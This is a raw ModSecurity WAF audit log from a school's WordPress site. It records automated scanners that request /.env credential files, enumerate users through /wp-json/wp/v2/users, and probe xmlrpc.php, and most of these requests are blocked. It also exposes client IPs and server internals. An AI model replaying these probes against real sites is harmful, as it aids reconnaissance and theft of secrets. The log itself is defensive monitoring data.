X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.82.96 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --251ce073-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --251ce073-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746863282614073 2566 (- - -) Stopwatch2: 1746863282614073 2566; combined=1174, p1=433, p2=708, p3=0, p4=0, p5=33, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --251ce073-Z-- --30311f2a-A-- [10/May/2025:14:48:06 +0700] aB8Etsi6w7GTj2w44Z6sdQAAANE 103.236.140.4 54496 103.236.140.4 8181 --30311f2a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.82.96 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.82.96 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --30311f2a-C-- demo.sayHello --30311f2a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --30311f2a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746863286744609 5909 (- - -) Stopwatch2: 1746863286744609 5909; combined=4830, p1=612, p2=3961, p3=43, p4=43, p5=106, sr=70, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --30311f2a-Z-- --d0f2484f-A-- [10/May/2025:14:49:58 +0700] aB8FJsi6w7GTj2w44Z6s6wAAAMQ 103.236.140.4 56748 103.236.140.4 8181 --d0f2484f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.37.37 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.37.37 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d0f2484f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d0f2484f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746863398574426 2824 (- - -) Stopwatch2: 1746863398574426 2824; combined=1287, p1=435, p2=818, p3=0, p4=0, p5=34, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d0f2484f-Z-- --badc6957-A-- [10/May/2025:14:50:01 +0700] aB8FKci6w7GTj2w44Z6s7wAAANc 103.236.140.4 56832 103.236.140.4 8181 --badc6957-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.37.37 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.37.37 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --badc6957-C-- demo.sayHello --badc6957-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --badc6957-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746863401854280 6171 (- - -) Stopwatch2: 1746863401854280 6171; combined=4380, p1=562, p2=3584, p3=42, p4=34, p5=93, sr=79, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --badc6957-Z-- --4e8d2f35-A-- [10/May/2025:14:50:28 +0700] aB8FRBLuBiaF9R054QBuJAAAABc 103.236.140.4 57368 103.236.140.4 8181 --4e8d2f35-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.88.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.88.173 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4e8d2f35-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4e8d2f35-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746863428204812 3084 (- - -) Stopwatch2: 1746863428204812 3084; combined=1403, p1=492, p2=877, p3=0, p4=0, p5=33, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4e8d2f35-Z-- --fff82d00-A-- [10/May/2025:14:50:33 +0700] aB8FSci6w7GTj2w44Z6tPwAAAMk 103.236.140.4 57468 103.236.140.4 8181 --fff82d00-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.88.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.88.173 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fff82d00-C-- demo.sayHello --fff82d00-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fff82d00-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746863433239188 6623 (- - -) Stopwatch2: 1746863433239188 6623; combined=4668, p1=577, p2=3907, p3=43, p4=35, p5=63, sr=71, sw=43, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fff82d00-Z-- --41b32850-A-- [10/May/2025:15:09:27 +0700] aB8Jt9r9PbfRBMhzxmRx7gAAAE8 103.236.140.4 53082 103.236.140.4 8181 --41b32850-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.164.5 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.164.5 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --41b32850-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --41b32850-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746864567215628 2353 (- - -) Stopwatch2: 1746864567215628 2353; combined=1323, p1=396, p2=880, p3=0, p4=0, p5=46, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --41b32850-Z-- --5747ae67-A-- [10/May/2025:15:09:32 +0700] aB8JvNr9PbfRBMhzxmRyAAAAAEU 103.236.140.4 53230 103.236.140.4 8181 --5747ae67-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.164.5 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.164.5 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5747ae67-C-- demo.sayHello --5747ae67-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5747ae67-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746864572634218 5389 (- - -) Stopwatch2: 1746864572634218 5389; combined=4223, p1=521, p2=3463, p3=35, p4=36, p5=104, sr=75, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5747ae67-Z-- --a9321b24-A-- [10/May/2025:15:21:39 +0700] aB8Mk6uC4AqLGUOyzyUVnQAAAIY 103.236.140.4 46034 103.236.140.4 8181 --a9321b24-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.222 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a9321b24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a9321b24-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746865299442424 2914 (- - -) Stopwatch2: 1746865299442424 2914; combined=1285, p1=412, p2=809, p3=0, p4=0, p5=64, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a9321b24-Z-- --495c0e6c-A-- [10/May/2025:15:21:43 +0700] aB8Ml9r9PbfRBMhzxmR5bQAAAFU 103.236.140.4 46266 103.236.140.4 8181 --495c0e6c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.222 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.222 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --495c0e6c-C-- demo.sayHello --495c0e6c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --495c0e6c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746865303596197 5528 (- - -) Stopwatch2: 1746865303596197 5528; combined=3899, p1=508, p2=3168, p3=66, p4=36, p5=72, sr=59, sw=49, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --495c0e6c-Z-- --2729a557-A-- [10/May/2025:15:25:04 +0700] aB8NYKuC4AqLGUOyzyUZaQAAAJE 103.236.140.4 57532 103.236.140.4 8181 --2729a557-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 138.197.191.87 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 138.197.191.87 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --2729a557-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2729a557-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746865504937805 700 (- - -) Stopwatch2: 1746865504937805 700; combined=289, p1=244, p2=0, p3=0, p4=0, p5=44, sr=61, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2729a557-Z-- --a2a6e413-A-- [10/May/2025:15:33:08 +0700] aB8PRKuC4AqLGUOyzyUc9AAAAJI 103.236.140.4 43152 103.236.140.4 8181 --a2a6e413-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.140 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.140 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36 Accept-Charset: utf-8 --a2a6e413-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a2a6e413-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746865988420393 875 (- - -) Stopwatch2: 1746865988420393 875; combined=378, p1=339, p2=0, p3=0, p4=0, p5=39, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a2a6e413-Z-- --0885b07a-A-- [10/May/2025:15:44:58 +0700] aB8SCtr9PbfRBMhzxmSE6wAAAEg 103.236.140.4 57982 103.236.140.4 8181 --0885b07a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.120.135.119 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.120.135.119 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0885b07a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0885b07a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746866698828316 3844 (- - -) Stopwatch2: 1746866698828316 3844; combined=1979, p1=598, p2=1347, p3=0, p4=0, p5=34, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0885b07a-Z-- --54d88d37-A-- [10/May/2025:15:54:22 +0700] aB8UPtr9PbfRBMhzxmSHwgAAAFI 103.236.140.4 41380 103.236.140.4 8181 --54d88d37-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 192.99.63.110 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 192.99.63.110 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --54d88d37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --54d88d37-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746867262094231 3069 (- - -) Stopwatch2: 1746867262094231 3069; combined=1348, p1=460, p2=838, p3=0, p4=0, p5=49, sr=116, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --54d88d37-Z-- --4544c874-A-- [10/May/2025:15:55:52 +0700] aB8UmBLuBiaF9R054QCNCgAAAAM 103.236.140.4 43658 103.236.140.4 8181 --4544c874-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 188.72.6.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 188.72.6.230 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4544c874-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4544c874-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746867352137175 2198 (- - -) Stopwatch2: 1746867352137175 2198; combined=1168, p1=393, p2=748, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4544c874-Z-- --2ed57c08-A-- [10/May/2025:16:13:47 +0700] aB8Yy8i6w7GTj2w44Z7R0gAAANE 103.236.140.4 37526 103.236.140.4 8181 --2ed57c08-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 117.247.169.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 117.247.169.195 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2ed57c08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2ed57c08-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746868427892436 2776 (- - -) Stopwatch2: 1746868427892436 2776; combined=1230, p1=417, p2=782, p3=0, p4=0, p5=30, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2ed57c08-Z-- --300d6459-A-- [10/May/2025:17:09:05 +0700] aB8lwauC4AqLGUOyzyUzhQAAAIg 103.236.140.4 39410 103.236.140.4 8181 --300d6459-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.60.183 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.60.183 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --300d6459-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --300d6459-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746871745922506 3404 (- - -) Stopwatch2: 1746871745922506 3404; combined=1490, p1=471, p2=982, p3=0, p4=0, p5=37, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --300d6459-Z-- --f08c8519-A-- [10/May/2025:17:09:16 +0700] aB8lzKuC4AqLGUOyzyUzlgAAAI8 103.236.140.4 39654 103.236.140.4 8181 --f08c8519-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.60.183 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.60.183 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f08c8519-C-- demo.sayHello --f08c8519-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: 